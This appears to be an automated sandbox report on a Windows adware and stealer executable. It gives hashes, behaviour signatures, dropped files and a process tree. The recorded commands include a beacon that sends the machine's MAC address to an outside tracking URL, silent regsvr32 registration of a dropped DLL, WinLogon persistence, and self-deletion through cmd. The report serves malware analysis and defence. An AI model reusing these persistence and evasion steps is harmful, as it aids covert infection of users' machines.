Overview

overview

10

Static

static

7

eec4560154...18.exe

windows7-x64

10

eec4560154...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    139s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-09-2024 00:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    eec456015479026f2a24f3dd8806eca0_JaffaCakes118.exe

  • Size

    94KB

  • MD5

    eec456015479026f2a24f3dd8806eca0

  • SHA1

    336a227d820fb2c6c8e8644e01b170e48f07d82f

  • SHA256

    d90dd97fbeca4377a9783c3ecc84889982fdbdd920ed4c1d04d879c68ac834c7

  • SHA512

    bc0e67e67c1695dc92ed9540560f92becd565caefe45880e0e8635e8df4cca99244256b30c1982df98b5c4911991c868303ff5e3838881a51615f8564e642097

  • SSDEEP

    1536:LOM0m2EQFVRfF1nfbghAN4v/8om9lPMSk/+FOyj0XJJ2aErQNHjFZ:LO/Eo7t1nfboAGDslPMSkuO9AxrQNHjr

Score
10/10
adwaredefense_evasiondiscoverypersistencestealer

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Installs/modifies Browser Helper Object 2 TTPs 2 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

    stealeradware
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Modifies registry class 50 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eec456015479026f2a24f3dd8806eca0_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\eec456015479026f2a24f3dd8806eca0_JaffaCakes118.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Loads dropped DLL
    • Installs/modifies Browser Helper Object
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2572
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao78.cn/tongji/count/count.asp?id=62-CA-C3-60-41-A9&ver=1.0
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2972
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2972 CREDAT:275457 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2964
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c regsvr32 /s c:\windows\system32\ieupdate.dll
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32 /s c:\windows\system32\ieupdate.dll
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        PID:2892
    • C:\Windows\SysWOW64\autoups.exe
      autoups.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2740
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c color 0a
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2888
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del C:\Windows\SysWOW64\autoups.exe > nul
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1724
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\a.bat""
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      PID:2800

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    a2fcddd4f233c4dee6dd409f87b4b352

    SHA1

    a00eaf0038b4bd77f679c2faf8b821dfac7b8e00

    SHA256

    c40c8d36c8eec86f40f9bd67afe38e3c3b82be884a722d83aef49c51b00d665b

    SHA512

    72141abdfbc0873650d673455b1207268744d10bfc7d7451a559ce0d5096224808cf4f0271471e11d88b1ef2acf0c6d005d135dce32459ad97a6c74515c629ce

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    ceb1cd8f0efe56803c228b9ad2fc924d

    SHA1

    11d3978e3995b96af42a1d67033e6e3a8014cbc5

    SHA256

    c9c713c6b9999e661ca07d8b3723dee6751c86cfa75963c62aab929097c2dde4

    SHA512

    6d3f2605deb5441d306077e8d4059908f330d730999c168a55cedcd4daf153b9faf0e808767ca2b48eb075154ad83ea8dfcb195277b16903cabedbda6efb600d

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    79eee49b918e3700960951a6491beafc

    SHA1

    19efaf3b6c37f47cc1b321d663ee69af3b86f44e

    SHA256

    6d533d66d162f681402bf2d4376dcc53d66967fbb619030ccceb4a4b481871f5

    SHA512

    9f65147ebda3249100f0bcdda2e5214f1baa1988e14318b7175a80bc93ade668a2480973f3800f4901187cdd40a7ff6ac6cbdf83b187e4cc1585b5e7d9c4a253

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    040bb710ad3ab5c49a41b121c779b5bd

    SHA1

    e1b38ac8073eecdc154d905e6c666df441e15630

    SHA256

    4c83bad73a7a9ee6fd03dd66743a6eec2fcc0ae47315137092f5b4f39f9df237

    SHA512

    8f898060afd80d39eb1d14cf35f2edf426a5076720eb60e8601c1b6746715ef2570772a7554bb4d96a8a5b526a88d909e2e901a2cde88b27c6f566de0621eefb

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    8df8977a806944bfc43daebe7ca40df4

    SHA1

    41762f1f6c9332dad1d550a1f58751d53f2d114a

    SHA256

    93d51f453d4853f7ab2dad6282ca09a138add7de15518a57f436b9f37a454eff

    SHA512

    c7e64ac01196920a66f019c323ba90aa322d9da5bba901cd5a016e35cf26417568e303d610ad6a522850ae485865c4b8b804079f3dcadd473feca05312b77012

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    4b671ad98516d9fb529879fc90c910ae

    SHA1

    1af47c3aeb58ba86117da227976125568bf34d81

    SHA256

    752ecf190b9333184b8aeb35a522dbc0c9791ffc9f907f88f49d93af69a3fa59

    SHA512

    1857d7deb77213c2dde6ed7633391198d88fb412326574198e3e672ce9b8e61baf78fccd55bc4a094abd6cf3b57904392ae7067276f30d38a4444a8fc0c90b26

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    6d2a2b3fc935b782a41a7dd501a8e7b6

    SHA1

    cc78c82ab185b5f74f20295ffbb0165a55ff99fe

    SHA256

    acf02037bd1d95ae086650d5539fc3dfbbc1c95222f7971604864700c53d7242

    SHA512

    79ec6c1303a306e96141a5043d8380929bd852b51f5ee696e049aa5cd6e2a0b9d68233aeaf4b17594c8105bc26987ec699e9e33fa92e03304b41f93d836cb473

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    65c7b52b1d2e59071d7157af15ee842b

    SHA1

    bcf663cd0685100652965f642ef69ea9b3cf651a

    SHA256

    36056e97d9ac4636d13a8bee42825454e63962a696dbe8d1f244975003455a92

    SHA512

    037147262dd9e6389d23e02e292b2526e584e675d2515a3d7998abfa8441707e868fd1663dbeae3a714b15daec3917e5966160e86559fca687cc57a3e12331d9

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    1b469040a4742614013e17769fa91aa2

    SHA1

    3bf0c00ef000d046c9ee294d567bfb03c8223bc0

    SHA256

    c593819c8cda492ecc4baaae0c31f4c9abb87b41b744e727a31152f2f26aeaf3

    SHA512

    c9dde31eb449029ecdd8fbe371d006964c5060295c4c70128ae346ef9cb0447e250904b933c3ce69ced5fa75dd87a92318a26e00a06e97cb4caa8a055710d156

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab9B65.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarA3D3.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\a.bat
    Filesize

    218B

    MD5

    ac2e7ca5909d0c139a8fa84641fbd5bd

    SHA1

    3e1827ff992a976f2e979ff0aa0fbc1475183d11

    SHA256

    e8c58fffc48ce9364567d21c10e49b4a3bd4ffde4972d5e4e36d519eb9f98237

    SHA512

    f19448e4ddbaa2da811409cc5829a0fe92f67e3e831d689c6ee267f1a748f98a1f6d957f37db25922e381fbcad59d17dee294f465b03a8bc3de8b3416fe653d5

    Download Submit

  • C:\Windows\SysWOW64\autoups.exe
    Filesize

    180KB

    MD5

    22cb3a551f770013b87d080e18c8f705

    SHA1

    71f207cd184ef3e62f58472ffeaa47dbb1b06df4

    SHA256

    6362e53304c62b7183a43f1462719de95a16462d4a3607a993f5504f039e1192

    SHA512

    b80e5480108a40ba672089409e633eeadbf3f7dccfe10114fd25c7412540a1c1aa0b9e776c12b07dcfee555057ec8356043aa2a8e5fde316a0694ac86cc345e4

    Download Submit

  • \??\c:\windows\SysWOW64\ieupdate.dll
    Filesize

    36KB

    MD5

    f129037d2b48bc4cf68c2057c087bf0f

    SHA1

    ec5b9aec356374b5c734698ae587f2faa344e9f9

    SHA256

    3b02cf5ba7165cf551f2cdebfb53200914cec6f175c38656ef7817a8153eb4d7

    SHA512

    a6cc088716cbc0e5615f8c487ac85b423b7e8b593e5aa60ed217adaf0e3689cfb189e43a730ab38f71a250570e0fcaa240cade6a61ed10bcce99f4b39ce34216

    Download Submit

  • memory/2572-24-0x0000000000400000-0x0000000000453000-memory.dmp

    Filesize

    332KB

    Download

  • memory/2572-0-0x0000000000400000-0x0000000000453000-memory.dmp

    Filesize

    332KB

    Download